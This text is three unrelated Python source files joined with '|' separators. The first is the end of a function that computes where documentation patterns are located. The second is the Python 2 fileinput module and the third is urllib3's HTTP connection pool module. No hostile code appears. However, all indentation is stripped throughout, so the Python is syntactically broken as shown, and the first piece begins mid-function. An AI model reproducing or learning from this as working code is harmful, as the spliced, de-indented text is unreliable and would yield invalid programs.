section = link.code_reference.local_context
page = link.code_reference.global_context
member_sections.add(section)
member_pages.add(page)
if section.pk not in visited_sections:
sections_objects[section.pk] = section
sectionsd[section.pk].append(member)
visited_sections.add(section.pk)
if page.pk not in visited_pages:
pages_objects[page.pk] = page
pagesd[page.pk].append(member)
visited_pages.add(page.pk)
member_locations[member.pk] = (member_sections, member_pages)
count += 1
sections = [(sections_objects[pk], sectionsd[pk]) for pk in sectionsd]
pages = [(pages_objects[pk], pagesd[pk]) for pk in pagesd]
# Sort them
sections.sort(key=lambda v: len(v[1]), reverse=True)
pages.sort(key=lambda v: len(v[1]), reverse=True)
return (member_locations, sections, pages)
def compute_doc_pattern_location(doc_pattern):
(member_locations, sections, pages) = \
get_locations_coverage(doc_pattern.main_pattern)
initial_coverage = doc_pattern.main_pattern.coverage * \
doc_pattern.main_pattern.pattern.extension.count()
locations = []
for (section, members) in sections:
section_coverage = float(len(members)) / initial_coverage
if section_coverage > DOC_PATTERN_LOCATION_THRESHOLD:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=section)
single_location.save()
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, single_section=True,
location=single_location, coverage=section_coverage)
location.save()
locations.append(location)
if len(locations) > 0:
# We found important sections. We're done.
return locations
multi_pages = []
for (page, members) in pages:
multi_pages.append(page)
page_coverage = float(len(members)) / initial_coverage
if page_coverage > DOC_PATTERN_LOCATION_THRESHOLD:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=page)
single_location.save()
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, single_page=True,
location=single_location, coverage=page_coverage)
location.save()
locations.append(location)
if len(locations) > 0:
# We found important pages. We're done
return locations
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, multi_page=True,
coverage=1.0)
location.save()
locations.append(location)
for page in multi_pages:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=page)
single_location.save()
location.locations.add(single_location)
return locations
|
|
"""Helper class to quickly write a loop over all standard input files.
Typical use is:
import fileinput
for line in fileinput.input():
process(line)
This iterates over the lines of all files listed in sys.argv[1:],
defaulting to sys.stdin if the list is empty. If a filename is '-' it
is also replaced by sys.stdin. To specify an alternative list of
filenames, pass it as the argument to input(). A single file name is
also allowed.
Functions filename(), lineno() return the filename and cumulative line
number of the line that has just been read; filelineno() returns its
line number in the current file; isfirstline() returns true iff the
line just read is the first line of its file; isstdin() returns true
iff the line was read from sys.stdin. Function nextfile() closes the
current file so that the next iteration will read the first line from
the next file (if any); lines not read from the file will not count
towards the cumulative line count; the filename is not changed until
after the first line of the next file has been read. Function close()
closes the sequence.
Before any lines have been read, filename() returns None and both line
numbers are zero; nextfile() has no effect. After all lines have been
read, filename() and the line number functions return the values
pertaining to the last line read; nextfile() has no effect.
All files are opened in text mode by default, you can override this by
setting the mode parameter to input() or FileInput.__init__().
If an I/O error occurs during opening or reading a file, the IOError
exception is raised.
If sys.stdin is used more than once, the second and further use will
return no lines, except perhaps for interactive use, or if it has been
explicitly reset (e.g. using sys.stdin.seek(0)).
Empty files are opened and immediately closed; the only time their
presence in the list of filenames is noticeable at all is when the
last file opened is empty.
It is possible that the last line of a file doesn't end in a newline
character; otherwise lines are returned including the trailing
newline.
Class FileInput is the implementation; its methods filename(),
lineno(), filelineno(), isfirstline(), isstdin(), nextfile() and close()
correspond to the functions in the module. In addition it has a
readline() method which returns the next input line, and a
__getitem__() method which implements the sequence behavior. The
sequence must be accessed in strictly sequential order; sequence
access and readline() cannot be mixed.
Optional in-place filtering: if the keyword argument inplace=1 is
passed to input() or to the FileInput constructor, the file is moved
to a backup file and standard output is directed to the input file.
This makes it possible to write a filter that rewrites its input file
in place. If the keyword argument backup=".<some extension>" is also
given, it specifies the extension for the backup file, and the backup
file remains around; by default, the extension is ".bak" and it is
deleted when the output file is closed. In-place filtering is
disabled when standard input is read. XXX The current implementation
does not work for MS-DOS 8+3 filesystems.
Performance: this module is unfortunately one of the slower ways of
processing large numbers of input lines. Nevertheless, a significant
speed-up has been obtained by using readlines(bufsize) instead of
readline(). A new keyword argument, bufsize=N, is present on the
input() function and the FileInput() class to override the default
buffer size.
XXX Possible additions:
- optional getopt argument processing
- isatty()
- read(), read(size), even readlines()
"""
import sys, os
__all__ = ["input","close","nextfile","filename","lineno","filelineno",
"isfirstline","isstdin","FileInput"]
_state = None
DEFAULT_BUFSIZE = 8*1024
def input(files=None, inplace=0, backup="", bufsize=0,
mode="r", openhook=None):
"""input([files[, inplace[, backup[, mode[, openhook]]]]])
Create an instance of the FileInput class. The instance will be used
as global state for the functions of this module, and is also returned
to use during iteration. The parameters to this function will be passed
along to the constructor of the FileInput class.
"""
global _state
if _state and _state._file:
raise RuntimeError, "input() already active"
_state = FileInput(files, inplace, backup, bufsize, mode, openhook)
return _state
def close():
"""Close the sequence."""
global _state
state = _state
_state = None
if state:
state.close()
def nextfile():
"""
Close the current file so that the next iteration will read the first
line from the next file (if any); lines not read from the file will
not count towards the cumulative line count. The filename is not
changed until after the first line of the next file has been read.
Before the first line has been read, this function has no effect;
it cannot be used to skip the first file. After the last line of the
last file has been read, this function has no effect.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.nextfile()
def filename():
"""
Return the name of the file currently being read.
Before the first line has been read, returns None.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.filename()
def lineno():
"""
Return the cumulative line number of the line that has just been read.
Before the first line has been read, returns 0. After the last line
of the last file has been read, returns the line number of that line.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.lineno()
def filelineno():
"""
Return the line number in the current file. Before the first line
has been read, returns 0. After the last line of the last file has
been read, returns the line number of that line within the file.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.filelineno()
def fileno():
"""
Return the file number of the current file. When no file is currently
opened, returns -1.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.fileno()
def isfirstline():
"""
Returns true if the line just read is the first line of its file,
otherwise returns false.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.isfirstline()
def isstdin():
"""
Returns true if the last line was read from sys.stdin,
otherwise returns false.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.isstdin()
class FileInput:
"""class FileInput([files[, inplace[, backup[, mode[, openhook]]]]])
Class FileInput is the implementation of the module; its methods
filename(), lineno(), filelineno(), isfirstline(), isstdin(), fileno(),
nextfile() and close() correspond to the functions of the same name
in the module.
In addition it has a readline() method which returns the next
input line, and a __getitem__() method which implements the
sequence behavior. The sequence must be accessed in strictly
sequential order; random access and readline() cannot be mixed.
"""
def __init__(self, files=None, inplace=0, backup="", bufsize=0,
mode="r", openhook=None):
if isinstance(files, basestring):
files = (files,)
else:
if files is None:
files = sys.argv[1:]
if not files:
files = ('-',)
else:
files = tuple(files)
self._files = files
self._inplace = inplace
self._backup = backup
self._bufsize = bufsize or DEFAULT_BUFSIZE
self._savestdout = None
self._output = None
self._filename = None
self._lineno = 0
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = None
self._buffer = []
self._bufindex = 0
# restrict mode argument to reading modes
if mode not in ('r', 'rU', 'U', 'rb'):
raise ValueError("FileInput opening mode must be one of "
"'r', 'rU', 'U' and 'rb'")
self._mode = mode
if inplace and openhook:
raise ValueError("FileInput cannot use an opening hook in inplace mode")
elif openhook and not callable(openhook):
raise ValueError("FileInput openhook must be callable")
self._openhook = openhook
def __del__(self):
self.close()
def close(self):
self.nextfile()
self._files = ()
def __iter__(self):
return self
def next(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
line = self.readline()
if not line:
raise StopIteration
return line
def __getitem__(self, i):
if i != self._lineno:
raise RuntimeError, "accessing lines out of order"
try:
return self.next()
except StopIteration:
raise IndexError, "end of input reached"
def nextfile(self):
savestdout = self._savestdout
self._savestdout = 0
if savestdout:
sys.stdout = savestdout
output = self._output
self._output = 0
if output:
output.close()
file = self._file
self._file = 0
if file and not self._isstdin:
file.close()
backupfilename = self._backupfilename
self._backupfilename = 0
if backupfilename and not self._backup:
try: os.unlink(backupfilename)
except OSError: pass
self._isstdin = False
self._buffer = []
self._bufindex = 0
def readline(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
if not self._file:
if not self._files:
return ""
self._filename = self._files[0]
self._files = self._files[1:]
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = 0
if self._filename == '-':
self._filename = '<stdin>'
self._file = sys.stdin
self._isstdin = True
else:
if self._inplace:
self._backupfilename = (
self._filename + (self._backup or os.extsep+"bak"))
try: os.unlink(self._backupfilename)
except os.error: pass
# The next few lines may raise IOError
os.rename(self._filename, self._backupfilename)
self._file = open(self._backupfilename, self._mode)
try:
perm = os.fstat(self._file.fileno()).st_mode
except (AttributeError, OSError):
# AttributeError occurs in Jython, where there's no
# os.fstat.
self._output = open(self._filename, "w")
else:
fd = os.open(self._filename,
os.O_CREAT | os.O_WRONLY | os.O_TRUNC,
perm)
self._output = os.fdopen(fd, "w")
try:
if hasattr(os, 'chmod'):
os.chmod(self._filename, perm)
except OSError:
pass
self._savestdout = sys.stdout
sys.stdout = self._output
else:
# This may raise IOError
if self._openhook:
self._file = self._openhook(self._filename, self._mode)
else:
self._file = open(self._filename, self._mode)
self._buffer = self._file.readlines(self._bufsize)
self._bufindex = 0
if not self._buffer:
self.nextfile()
# Recursive call
return self.readline()
def filename(self):
return self._filename
def lineno(self):
return self._lineno
def filelineno(self):
return self._filelineno
def fileno(self):
if self._file:
try:
return self._file.fileno()
except ValueError:
return -1
else:
return -1
def isfirstline(self):
return self._filelineno == 1
def isstdin(self):
return self._isstdin
def hook_compressed(filename, mode):
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode)
elif ext == '.bz2':
import bz2
return bz2.BZ2File(filename, mode)
else:
return open(filename, mode)
def hook_encoded(encoding):
import codecs
def openhook(filename, mode):
return codecs.open(filename, mode, encoding)
return openhook
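# Illustrative usage sketch (not part of the module): decode files through a
# codec while iterating, by passing the hook as the openhook argument.
#
#   for line in input(files, openhook=hook_encoded("utf-8")):
#       process(line)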
def _test():
import getopt
inplace = 0
backup = 0
opts, args = getopt.getopt(sys.argv[1:], "ib:")
for o, a in opts:
if o == '-i': inplace = 1
if o == '-b': backup = a
for line in input(args, inplace=inplace, backup=backup):
if line[-1:] == '\n': line = line[:-1]
if line[-1:] == '\r': line = line[:-1]
print "%d: %s[%d]%s %s" % (lineno(), filename(), filelineno(),
isfirstline() and "*" or "", line)
print "%d: %s[%d]" % (lineno(), filename(), filelineno())
if __name__ == '__main__':
_test()
|
|
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
import Queue as _ # Platform-specific: Windows
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError, ConnectionError
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
# httplib doesn't like it when we include brackets in ipv6 addresses
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
def close(self):
"""
Close all pooled connections and disable the pool.
"""
pass
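# Illustrative sketch (not part of this module): ConnectionPool supports the
# context-manager protocol defined above, closing its pooled connections when
# the block exits.
#
#   with HTTPConnectionPool('example.org') as pool:
#       response = pool.request('GET', '/')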
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
"""
scheme = 'http'
ConnectionCls = HTTPConnection
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s" %
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older
httplib_response = conn.getresponse()
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s" % (method, url, http_version,
httplib_response.status,
httplib_response.length))
return httplib_response
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
if conn:
conn.close()
conn = None
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
if conn:
conn.close()
conn = None
raise
except (TimeoutError, HTTPException, SocketError, ConnectionError) as e:
if conn:
                # Discard the connection for these exceptions. It will be
                # replaced during the next _get_conn() call.
conn.close()
conn = None
if isinstance(e, SocketError) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if release_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s" % (retries, err, url))
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
log.info("Redirecting %s -> %s" % (url, redirect_location))
return self.urlopen(method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
retries = retries.increment(method, url, response=response, _pool=self)
retries.sleep()
log.info("Forced retry: %s" % url)
return self.urlopen(method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
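
# Editor's note: the following is an illustrative sketch, not part of urllib3.
# It shows how the ``retries``/``redirect`` parameters documented in
# ``HTTPConnectionPool.urlopen`` above interact; the host, path and retry
# counts are arbitrary example values.
def _example_urlopen_with_retries():
    # A Retry object gives fine-grained control; a plain int would only retry
    # connection errors, and False disables retries entirely (returning
    # redirect responses instead of raising MaxRetryError).
    retries = Retry(total=3, redirect=2, raise_on_redirect=False)
    pool = HTTPConnectionPool('example.com', maxsize=2)
    response = pool.urlopen('GET', '/', retries=retries)
    return response.status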
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs`` and
``ssl_version`` are only used if :mod:`ssl` is available and are fed into
:meth:`urllib3.util.ssl_wrap_socket` to upgrade the connection socket
into an SSL socket.
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
**conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.org/en/latest/security.html'),
InsecureRequestWarning)
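
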